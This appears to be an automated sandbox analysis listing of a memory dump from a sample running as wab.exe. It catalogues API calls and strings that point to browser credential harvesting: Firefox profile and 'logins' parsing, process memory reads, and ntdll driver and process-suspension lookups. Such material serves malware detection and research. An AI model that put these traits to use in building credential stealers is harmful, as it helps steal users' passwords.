                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                    • String ID: :stringdata$ftp://$http://$https://
                    • API String ID: 2787044678-1921111777
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                    • GetWindowRect.USER32(?,?), ref: 00414088
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                    • GetDC.USER32 ref: 004140E3
                    • wcslen.MSVCRT ref: 00414123
                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                    • ReleaseDC.USER32(?,?), ref: 00414181
                    • _snwprintf.MSVCRT ref: 00414244
                    • SetWindowTextW.USER32(?,?), ref: 00414258
                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                    • GetClientRect.USER32(?,?), ref: 004142E1
                    • GetWindowRect.USER32(?,?), ref: 004142EB
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                    • GetClientRect.USER32(?,?), ref: 0041433B
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 2080319088-3046471546
                    APIs
                    • EndDialog.USER32(?,?), ref: 00413221
                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                    • memset.MSVCRT ref: 00413292
                    • memset.MSVCRT ref: 004132B4
                    • memset.MSVCRT ref: 004132CD
                    • memset.MSVCRT ref: 004132E1
                    • memset.MSVCRT ref: 004132FB
                    • memset.MSVCRT ref: 00413310
                    • GetCurrentProcess.KERNEL32 ref: 00413318
                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                    • memset.MSVCRT ref: 004133C0
                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                    • memcpy.MSVCRT ref: 004133FC
                    • wcscpy.MSVCRT ref: 0041341F
                    • _snwprintf.MSVCRT ref: 0041348E
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                    • SetFocus.USER32(00000000), ref: 004134B7
                    Strings
                    • {Unknown}, xrefs: 004132A6
                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                    • API String ID: 4111938811-1819279800
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                    • EndDialog.USER32(?,?), ref: 0040135E
                    • DeleteObject.GDI32(?), ref: 0040136A
                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                    • ShowWindow.USER32(00000000), ref: 00401398
                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                    • ShowWindow.USER32(00000000), ref: 004013A7
                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                    • String ID:
                    • API String ID: 829165378-0
                    APIs
                    • memset.MSVCRT ref: 00404172
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • wcscpy.MSVCRT ref: 004041D6
                    • wcscpy.MSVCRT ref: 004041E7
                    • memset.MSVCRT ref: 00404200
                    • memset.MSVCRT ref: 00404215
                    • _snwprintf.MSVCRT ref: 0040422F
                    • wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 0040426E
                    • memset.MSVCRT ref: 004042CD
                    • memset.MSVCRT ref: 004042E2
                    • _snwprintf.MSVCRT ref: 004042FE
                    • wcscpy.MSVCRT ref: 00404311
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                    • API String ID: 2454223109-1580313836
                    APIs
                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                    • SetMenu.USER32(?,00000000), ref: 00411453
                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                    • memcpy.MSVCRT ref: 004115C8
                    • ShowWindow.USER32(?,?), ref: 004115FE
                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                    • API String ID: 4054529287-3175352466
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset$wcscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 3143752011-1996832678
                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                    • API String ID: 667068680-2887671607
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemset$wcscpy$wcscat
                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                    • API String ID: 1607361635-601624466
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf$memset$wcscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 2000436516-3842416460
                    APIs
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1043902810-0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@_snwprintfwcscpy
                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                    • API String ID: 2899246560-1542517562
                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                    APIs
                    • memset.MSVCRT ref: 0040DBCD
                    • memset.MSVCRT ref: 0040DBE9
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                    • wcscpy.MSVCRT ref: 0040DC2D
                    • wcscpy.MSVCRT ref: 0040DC3C
                    • wcscpy.MSVCRT ref: 0040DC4C
                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                    • wcscpy.MSVCRT ref: 0040DCC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                    • API String ID: 3330709923-517860148
                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040806A
                    • memset.MSVCRT ref: 0040807F
                    • _wtoi.MSVCRT ref: 004081AF
                    • _wcsicmp.MSVCRT ref: 004081C3
                    • memset.MSVCRT ref: 004081E4
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                    • String ID: logins$null
                    • API String ID: 3492182834-2163367763
                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • memset.MSVCRT ref: 004085CF
                    • memset.MSVCRT ref: 004085F1
                    • memset.MSVCRT ref: 00408606
                    • strcmp.MSVCRT ref: 00408645
                    • _mbscpy.MSVCRT ref: 004086DB
                    • _mbscpy.MSVCRT ref: 004086FA
                    • memset.MSVCRT ref: 0040870E
                    • strcmp.MSVCRT ref: 0040876B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                    • String ID: ---
                    • API String ID: 3437578500-2854292027
                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                    APIs
                    • memset.MSVCRT ref: 0041087D
                    • memset.MSVCRT ref: 00410892
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • GetSysColor.USER32(0000000F), ref: 00410999
                    • DeleteObject.GDI32(?), ref: 004109D0
                    • DeleteObject.GDI32(?), ref: 004109D6
                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1010922700-0
                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                    APIs
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • malloc.MSVCRT ref: 004186B7
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                    • malloc.MSVCRT ref: 004186FE
                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$FullNamePath$malloc$Version
                    • String ID: |A
                    • API String ID: 4233704886-1717621600
                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                    • API String ID: 2081463915-1959339147
                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2012295524-70141382
                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
